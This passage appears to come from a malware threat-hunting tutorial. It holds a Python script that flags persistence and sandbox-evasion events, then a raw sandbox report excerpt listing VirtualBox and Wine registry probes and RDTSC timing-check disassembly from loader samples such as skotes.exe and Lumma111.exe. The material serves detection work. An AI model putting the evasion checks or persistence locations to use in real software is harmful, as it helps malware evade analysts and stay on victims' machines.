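        if RUN_KEY_RE.search(target) and any(d in data.lower() for d in SUSPICIOUS_DIRS):
            value = target.rsplit("\\", 1)[-1]
            return ("persistence", "Run value " + value + " -> " + data)
    elif eid == 11:                                 # Sysmon FileCreate
        if TASKS_JOB_RE.match(event["TargetFilename"]):
            return ("persistence", "legacy scheduled task dropped: " + event["TargetFilename"])
    elif event.get("Api") == "FindWindowW":        # sandbox API-trace record (assumed shape)
        if event.get("ClassName", "").lower() in MONITOR_CLASSES:
            return ("anti-analysis", "probes for monitor window class " + event["ClassName"])
    elif event.get("Api") == "RegOpenKeyExW":      # sandbox API-trace record (assumed shape)
        if any(event.get("Key", "").lower().endswith(k) for k in SANDBOX_KEYS):
            return ("anti-analysis", "sandbox/VM registry probe " + event["Key"])
    return None


def triage(events):
    """Return [(image, category, reason)] for every event that classify() flags."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict:
            hits.append((ev.get("Image", "?"), *verdict))
    return hits


SKOTES = r"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
# Constructed SID: Sysmon writes Run keys under HKU\<SID>\..., the report shows HKCU.
HKU_RUN = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
# Constructed events mirroring the report; Details paths and the two benign controls are assumed.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": SKOTES, "TargetObject": HKU_RUN + r"\064deba48e.exe",
     "Details": r"C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\Microsoft OneDrive\OneDriveSetup.exe",   # benign control
     "TargetObject": HKU_RUN + r"\OneDrive",
     "Details": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"EventID": 11, "Image": r"C:\Users\user\Desktop\file.exe",
     "TargetFilename": r"C:\Windows\Tasks\skotes.job"},
    {"Api": "FindWindowW", "Image": r"C:\Users\user\Desktop\file.exe", "ClassName": "PROCMON_WINDOW_CLASS"},
    {"Api": "FindWindowW", "Image": r"C:\Users\user\Desktop\file.exe", "ClassName": "Shell_TrayWnd"},  # benign control
    {"Api": "RegOpenKeyExW", "Image": SKOTES, "Key": r"HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__"},
]

if __name__ == "__main__":
    for image, category, reason in triage(SAMPLE_EVENTS):
        exe = image.rsplit("\\", 1)[-1]
        print(f"[{category:13}] {exe:12} {reason}")
```

Two points a hunter should take from the output. The OneDrive record is not flagged even though it is a Run value under `AppData\Local`, because the rule keys on the specific scratch folders a loader uses, not on the user profile as a whole; widening `SUSPICIOUS_DIRS` is a quick way to drown in false positives. And the `.job` file in `C:\Windows\Tasks` is the legacy Task Scheduler 1.0 format, which Windows still loads, so this persistence produces no `schtasks.exe` process-creation event; the file create is the thing to alert on.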

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8F31 second address: BB8F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8F37 second address: BB8F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB90DA second address: BB90E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB90E0 second address: BB90E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB922E second address: BB9232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9232 second address: BB924F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FE420CEA00Ch 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FE420CEA006h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB924F second address: BB926E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE4211E2ABAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB93BC second address: BB93C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB93C0 second address: BB93D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB93D0 second address: BB93F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE420CEA014h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE420CEA00Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB93F9 second address: BB93FE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9556 second address: BB955C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB955C second address: BB9578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE4211E2AB6h 0x0000000a popad 0x0000000b jns 00007FE4211E2ABEh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9578 second address: BB9581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9581 second address: BB9596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2AC1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9723 second address: BB973E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE420CEA00Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB973E second address: BB9742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9742 second address: BB9752 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE420CEA006h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9752 second address: BB9756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD42B second address: BBD430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD430 second address: BBD47A instructions: 0x00000000 rdtsc 0x00000002 js 00007FE4211E2ABCh 0x00000008 jno 00007FE4211E2AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edi 0x00000012 pushad 0x00000013 jmp 00007FE4211E2AC3h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b pop edi 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 jmp 00007FE4211E2AC4h 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD47A second address: BBD484 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD513 second address: BBD51A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD51A second address: BBD533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FE420CEA00Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD533 second address: BBD5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 stc 0x00000008 push 00000000h 0x0000000a mov dword ptr [ebp+122D330Ah], eax 0x00000010 call 00007FE4211E2AC4h 0x00000015 push edx 0x00000016 sub dword ptr [ebp+122D23C1h], edi 0x0000001c pop ecx 0x0000001d pop ecx 0x0000001e call 00007FE4211E2AB9h 0x00000023 jmp 00007FE4211E2AC0h 0x00000028 push eax 0x00000029 pushad 0x0000002a jmp 00007FE4211E2AC2h 0x0000002f jmp 00007FE4211E2ABAh 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 pushad 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD5A0 second address: BBD5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edi 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD5B2 second address: BBD628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2ABCh 0x00000009 popad 0x0000000a pop edi 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jbe 00007FE4211E2AC4h 0x00000015 pop eax 0x00000016 mov esi, ebx 0x00000018 push 00000003h 0x0000001a or di, 20C8h 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D345Dh] 0x00000027 push 00000003h 0x00000029 push 6F3F7275h 0x0000002e jbe 00007FE4211E2AC9h 0x00000034 jmp 00007FE4211E2AC3h 0x00000039 add dword ptr [esp], 50C08D8Bh 0x00000040 mov dx, 8184h 0x00000044 lea ebx, dword ptr [ebp+12452350h] 0x0000004a mov esi, edi 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD628 second address: BBD62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD62C second address: BBD630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD630 second address: BBD636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD865 second address: BBD916 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE4211E2ACCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 6AD48A29h 0x00000011 or dword ptr [ebp+122D2A79h], eax 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FE4211E2AB8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov ecx, dword ptr [ebp+122D3451h] 0x00000039 mov dword ptr [ebp+122D330Ah], eax 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007FE4211E2AB8h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 0000001Ah 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b add dx, E134h 0x00000060 adc edx, 65177127h 0x00000066 push 00000003h 0x00000068 sub edx, dword ptr [ebp+122D1C29h] 0x0000006e mov edx, dword ptr [ebp+122D333Dh] 0x00000074 call 00007FE4211E2AB9h 0x00000079 pushad 0x0000007a jmp 00007FE4211E2ABAh 0x0000007f push eax 0x00000080 push edx 0x00000081 jp 00007FE4211E2AB6h 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD916 second address: BBD91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD91A second address: BBD947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jns 00007FE4211E2AB6h 0x00000010 jns 00007FE4211E2AB6h 0x00000016 popad 0x00000017 pop esi 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FE4211E2ABFh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD947 second address: BBD957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA00Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD957 second address: BBD95B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD95B second address: BBD978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FE420CEA011h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD978 second address: BBD97E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD97E second address: BBD982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD982 second address: BBD986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD986 second address: BBD99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FE420CEA008h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD99C second address: BBD9BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b and esi, 4BBC7528h 0x00000011 lea ebx, dword ptr [ebp+12452364h] 0x00000017 mov di, cx 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD9BE second address: BBD9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD9C3 second address: BBD9C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD9C9 second address: BBD9CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD9CD second address: BBD9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE4211E2AC7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4D4 second address: BDC4D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4D9 second address: BDC4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4E1 second address: BDC4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE420CEA006h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4F0 second address: BDC4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4F4 second address: BDC4F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4F8 second address: BDC522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE4211E2AC5h 0x0000000f pushad 0x00000010 jc 00007FE4211E2AB6h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC522 second address: BDC527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA390 second address: BDA3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2AC2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA3A8 second address: BDA3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA3AD second address: BDA3CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA4F0 second address: BDA4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA4F4 second address: BDA50A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE4211E2AC1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA50A second address: BDA530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnp 00007FE420CEA00Ch 0x0000000e jnc 00007FE420CEA006h 0x00000014 jo 00007FE420CEA00Eh 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jne 00007FE420CEA006h 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA530 second address: BDA534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA7FA second address: BDA811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA013h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA811 second address: BDA832 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FE4211E2AC0h 0x0000000e jo 00007FE4211E2AB6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA986 second address: BDA9A5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE420CEA008h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE420CEA011h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDAB05 second address: BDAB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDAC7A second address: BDAC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDAC7E second address: BDAC82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDAF36 second address: BDAF42 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE420CEA006h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB4F0 second address: BDB4FC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4211E2ABEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC885 second address: BAC8AC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE420CEA01Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC8AC second address: BAC8B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC8B0 second address: BAC8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
